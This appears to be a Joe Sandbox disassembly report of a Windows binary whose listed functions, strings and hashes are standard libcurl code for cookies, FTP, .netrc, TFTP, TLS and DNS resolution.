Part of subcall function 000D2813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D2848

_strrchr.LIBCMT ref: 000FE194
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 000FE1C3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FE1E3

Strings

Uploading to a URL without a file name, xrefs: 000FE380
path contains control characters, xrefs: 000FE154
Request has same path as previous transfer, xrefs: 000FE41F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strrchrcallocfreemalloc
String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
API String ID: 2159935718-4131979473
Opcode ID: 5d388b734b2a9bcb3cae0211f0a5a12d2e7722508121c7a475e07628c175557b
Instruction ID: 0c858b2a1c3896a7a46b221cddf3ad4c4c3e0cf6580a711aec9d0043e01742b9
Opcode Fuzzy Hash: 5d388b734b2a9bcb3cae0211f0a5a12d2e7722508121c7a475e07628c175557b
Instruction Fuzzy Hash: D7A13330A0434A9FDB688F64D848ABE7BF5EF44310F14407EEA46E36A1DB70AD419B55

Function 000E0F34 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000DFA05: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00000000,?,000E128E,?,?,000E0F71,00000000,?,00000001), ref: 000DFA12

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,000E128E,?), ref: 000E0F81
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00116C58,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,000E128E), ref: 000E0FD2
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(# Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.,00000000,?,?,?,?,?,?,?,?,?,?,000E128E,?,?,74F83C50), ref: 000E0FED
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E101B
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,00000004,000E0B10), ref: 000E105E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E10A0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E10C0
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,000E128E,?,?,74F83C50,00000000,000E182F), ref: 000E10CA

Part of subcall function 000F50DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 000F510A
Part of subcall function 000F50DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 000F5118
Part of subcall function 000F50DE: MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 000F5166
Part of subcall function 000F50DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000F5175
Part of subcall function 000F50DE: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5181

_unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?,?,?,?,?,?,?,000E128E,?,?,74F83C50,00000000,000E182F), ref: 000E10E0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,000E128E,?,?,74F83C50,00000000,000E182F), ref: 000E10FA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,000E128E,?,?,74F83C50,00000000,000E182F), ref: 000E113C

Strings

%s.%s.tmp, xrefs: 000E0FB2
%s, xrefs: 000E1083
# Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 000E0FE8

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdup$FileMove__acrt_iob_func_time64_unlinkcallocfclosefopenfputsqsort
String ID: # Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
API String ID: 2634863294-1951421411
Opcode ID: 6a483c86f756c77e1003be790543e10ca4df6ed33173613dd7cc0e3f3ee66d48
Instruction ID: f17bba84b4e5402b931cd34e785fed853297dda33ecf4c8ace6c03215dd723bf
Opcode Fuzzy Hash: 6a483c86f756c77e1003be790543e10ca4df6ed33173613dd7cc0e3f3ee66d48
Instruction Fuzzy Hash: B351F871A04259DFDF149F65EC45AEEBBF5EF88750F14402AE901B7281DBB05C828BA1

Function 000FB8E9 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 364COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FB935
___from_strstr_to_strchr.LIBCMT ref: 000FB962

Part of subcall function 000C3857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 000C3872

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FBC25
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FBD5A

Strings

Illegal port number in EPSV reply, xrefs: 000FB9C2
Weirdly formatted EPSV reply, xrefs: 000FBA0D
Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 000FBAFB
Connecting to %s (%s) port %d, xrefs: 000FBD2E
%c%c%c%u%c, xrefs: 000FB98D
Bad PASV/EPSV response: %03d, xrefs: 000FBDB8
Couldn't interpret the 227-response, xrefs: 000FBDA6
Can't resolve proxy host %s:%hu, xrefs: 000FBBCF
%u,%u,%u,%u,%u,%u, xrefs: 000FBA7C
Can't resolve new host %s:%hu, xrefs: 000FBCA4
%u.%u.%u.%u, xrefs: 000FBB34

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$___from_strstr_to_strchr__stdio_common_vsscanf
String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
API String ID: 2616960956-1503635593
Opcode ID: 3c0249be188157892dff5f522a596c9f5770f1a8b308a882de1d94a3a521a55c
Instruction ID: 085ddea8fa259f3d27fe19f453ae295848de1fd791b7819f39cbb4904763cb94
Opcode Fuzzy Hash: 3c0249be188157892dff5f522a596c9f5770f1a8b308a882de1d94a3a521a55c
Instruction Fuzzy Hash: 37D1F3B1A08346ABD7149F24DC40BBAB7E5FF84310F00492EF68593682EB74E854DF96

Function 000F8B9D Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 346fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000F8C37
fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,00000000), ref: 000F8C5B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8D7D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8E2E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8F8D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8FA8
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000F8FB1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F9015
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F904B

Strings

login, xrefs: 000F8E75
machine, xrefs: 000F8EAD, 000F8F0C
, xrefs: 000F8C93, 000F8F45
password, xrefs: 000F8E91
macdef, xrefs: 000F8EF8
default, xrefs: 000F8F21

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$fclosefgetsfopen
String ID: $default$login$macdef$machine$password
API String ID: 1690894011-416575051
Opcode ID: af7e3cfd91c589766b4bf23870ed22cbabb17d4767621ce4a6e6a37c6c304c6a
Instruction ID: 42208477ee7909fc51933c1cbc0d8e400f6a181231160f1e19fc8186be2cb73b
Opcode Fuzzy Hash: af7e3cfd91c589766b4bf23870ed22cbabb17d4767621ce4a6e6a37c6c304c6a
Instruction Fuzzy Hash: 48D1B631A042AC8FDB358B249C443F9BBF2AF55350F1880EAD589A3691CFB58EC5DB51

Function 000E5106 Relevance: 25.3, APIs: 20, Instructions: 257COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5157
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E516E

Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,000E1751,?,00000000,?,?,?,000C8BF9), ref: 000E6D39
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E6D52
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8BF9), ref: 000E6D69
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C8BF9), ref: 000E6D80
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6D97
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DAE
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DC5
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DDC
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DF3
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E0A
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E21
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E38
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E4F

Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E66

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E51A4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E51C2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5219
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5237
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5255
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5273
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E52DF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E52FD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E531B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5339
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5356
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5370
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E53B9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E542A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5449
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5466
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5483
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E54AD

Part of subcall function 000DE574: getsockname.WS2_32(?,?,?), ref: 000DE5C6
Part of subcall function 000DE574: WSAGetLastError.WS2_32(?,?,?), ref: 000DE5D0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$ErrorLastgetsockname
String ID:
API String ID: 3375700865-0
Opcode ID: 3f3fd7234440f28b28f3aaefe9b511ddd0f6601f038385443ba61321c1fcb3f1
Instruction ID: 4112db803b335a3052eae0e2ab7c42be1abbd3beb2aca7cf2eebf3d9dd614e7e
Opcode Fuzzy Hash: 3f3fd7234440f28b28f3aaefe9b511ddd0f6601f038385443ba61321c1fcb3f1
Instruction Fuzzy Hash: 19B11A31A14615DFDB099F24E8847DCBBB2FF48311F14817AEC599B262CBB42851CFA5

Function 000E1EF9 Relevance: 25.2, APIs: 20, Instructions: 164COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 000E1F12
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1F31
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1F4E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1F6B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1F88
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1FA5

Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,000E1751,?,00000000,?,?,?,000C8BF9), ref: 000E6D39
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E6D52
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8BF9), ref: 000E6D69
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C8BF9), ref: 000E6D80
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6D97
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DAE
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DC5
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DDC
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DF3
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E0A
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E21
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E38
Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E4F

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1FCD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1FEA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2007
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2024
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2041

Part of subcall function 000DD126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD13A

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2066
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E207D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2094
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E20AB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E20C5

Part of subcall function 000E1DD7: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1DFA

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2102

Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E66

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E212A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2147
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E215F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 72b9ee8ede3b102992a3d65b821915cfa04537d45707e8e36664932b679a9936
Instruction ID: 464ec52417da69d378d942bbf5bc3b2fe02fa565ec2c7f474a728c2045693c79
Opcode Fuzzy Hash: 72b9ee8ede3b102992a3d65b821915cfa04537d45707e8e36664932b679a9936
Instruction Fuzzy Hash: 7F61C531A14A26EFCB0D5F34ED4859CFBA6FF48351F10812FE46693662CBB428618F91

Function 000F7979 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 310COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F7B0C

Strings

TFTP buffer too small for options, xrefs: 000F7CD8
%s%c%s%c, xrefs: 000F7B2B
%I64d, xrefs: 000F7BA5
tftp_send_first: internal error, xrefs: 000F79CE
TFTP file name too long, xrefs: 000F7AEB
netascii, xrefs: 000F7998
octet, xrefs: 000F7993
tsize, xrefs: 000F7BD8
timeout, xrefs: 000F7CA1
blksize, xrefs: 000F7C3E

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
API String ID: 1294909896-119092532
Opcode ID: c2ad9a5ec0e28bad571daf6930de87f45ce72b66990e819a3e5ab855d715d267
Instruction ID: 2f6a482208f73fc93d0575d22de5122b334a92bf01a0884ef46bf83014ef60d1
Opcode Fuzzy Hash: c2ad9a5ec0e28bad571daf6930de87f45ce72b66990e819a3e5ab855d715d267
Instruction Fuzzy Hash: E9B1E131A083099FDB29CF68CC85BFAB7B5AF45300F0081A9E20D97792DB70AD45DB91

Function 001051EC Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 285encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 000E720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,000E1751,?,00000000,?,?,?,000C8BF9), ref: 000E724B
Part of subcall function 000E720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E7261

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00105531
CertFreeCertificateContext.CRYPT32(00000000), ref: 00105587

Strings

ALPN: server accepted %.*s, xrefs: 00105335
schannel: failed to setup stream orientation, xrefs: 001052CB
http, xrefs: 00105352
schannel: failed to setup replay detection, xrefs: 00105289
schannel: failed to setup confidentiality, xrefs: 0010529D
schannel: failed to setup memory allocation, xrefs: 001052B4
schannel: failed to retrieve remote cert context, xrefs: 001055B3
schannel: failed to store credential handle, xrefs: 00105490
schannel: failed to retrieve ALPN result, xrefs: 00105316
ALPN: server did not agree on a protocol. Uses default., xrefs: 00105377
schannel: failed to setup sequence detection, xrefs: 00105275
/1.1, xrefs: 0010535B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$CertCertificateContextFreecalloc
String ID: /1.1$ALPN: server accepted %.*s$ALPN: server did not agree on a protocol. Uses default.$http$schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle
API String ID: 219865100-3105508259
Opcode ID: 4508634f45fdfc178c8e46457137b574f81c16d130184a519581839f3759e008
Instruction ID: 354bcc3a3afe4a0b56695c13911973843bbe934d6a652662d15b24c00bb5d998
Opcode Fuzzy Hash: 4508634f45fdfc178c8e46457137b574f81c16d130184a519581839f3759e008
Instruction Fuzzy Hash: 0FB1C631A04614DFDF299B14DC85BEAB7B6BF49310F1441DAE488AB2C2DBB49D81CF91

Function 0010D19B Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB20
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB42
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB9C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D01D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D033

Strings

, xrefs: 0010D2BA
, xrefs: 0010D291
., xrefs: 0010D213
, xrefs: 0010D269
, xrefs: 0010D1D8
, xrefs: 0010D255
:, xrefs: 0010D21C
, xrefs: 0010D22D
., xrefs: 0010D2B2

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$callocmallocrealloc
String ID: $ $ $ $ $ $.$.$:
API String ID: 4199894680-3908554926
Opcode ID: b4d77624785fe726511da31c3a39d96aba8d277841787b272e0ab384c12c3f26
Instruction ID: 6e30d4c4fa8d118ff24cde85cde3d85a9fdef9112b48b8e6b972400afa02b711
Opcode Fuzzy Hash: b4d77624785fe726511da31c3a39d96aba8d277841787b272e0ab384c12c3f26
Instruction Fuzzy Hash: 5471AC31600B129FD728DF69E648725BBE2FF44320F19821AE485C7AD1D7B5F881CB92

Function 0010FE08 Relevance: 24.3, APIs: 13, Strings: 3, Instructions: 306COMMON

Download Yara Rule

Strings

GSSAPI handshake failure (empty security message), xrefs: 00110193
GSSAPI handshake failure (invalid security layer), xrefs: 0010FF18
GSSAPI handshake failure (invalid security data), xrefs: 0010FED3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
API String ID: 0-3320144510
Opcode ID: 3bf217a249cb1c1deaf32803e64bb8e3856a712cca5b7265dbf95dbc086092de
Instruction ID: 8c538917e252f5bc18e3a849110cbd80b31abf37eefcf28ab9c11f5d0958b75f
Opcode Fuzzy Hash: 3bf217a249cb1c1deaf32803e64bb8e3856a712cca5b7265dbf95dbc086092de
Instruction Fuzzy Hash: 23C15B71E00219DFCB19CFA8EC4499DBBF5FF48310F14802AE845E7651DBB4A982CB55

Function 000EED3C Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 308COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000EEEE5

Strings

Couldn't parse CURLOPT_RESOLVE removal entry '%s', xrefs: 000EEDAD
RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 000EF0AA
Added %s:%d:%s to DNS cache%s, xrefs: 000EF07D
*, xrefs: 000EF08B
Resolve address '%s' found illegal, xrefs: 000EF105
%255[^:]:%d, xrefs: 000EED98
Couldn't parse CURLOPT_RESOLVE entry '%s', xrefs: 000EF121
+, xrefs: 000EF055
(non-permanent), xrefs: 000EF05C
RESOLVE %s:%d is - old addresses discarded, xrefs: 000EEFEE

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: (non-permanent)$%255[^:]:%d$*$+$Added %s:%d:%s to DNS cache%s$Couldn't parse CURLOPT_RESOLVE entry '%s'$Couldn't parse CURLOPT_RESOLVE removal entry '%s'$RESOLVE %s:%d is - old addresses discarded$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal
API String ID: 601868998-1491845622
Opcode ID: c17a9d89a7ea4fa60088d3de526c9893537200820245ea1cfed98b487129b478
Instruction ID: 8c1df70f8286d233f485eab5f9e00bd7095af747970aa6e9f4b60be7dde2fd01
Opcode Fuzzy Hash: c17a9d89a7ea4fa60088d3de526c9893537200820245ea1cfed98b487129b478
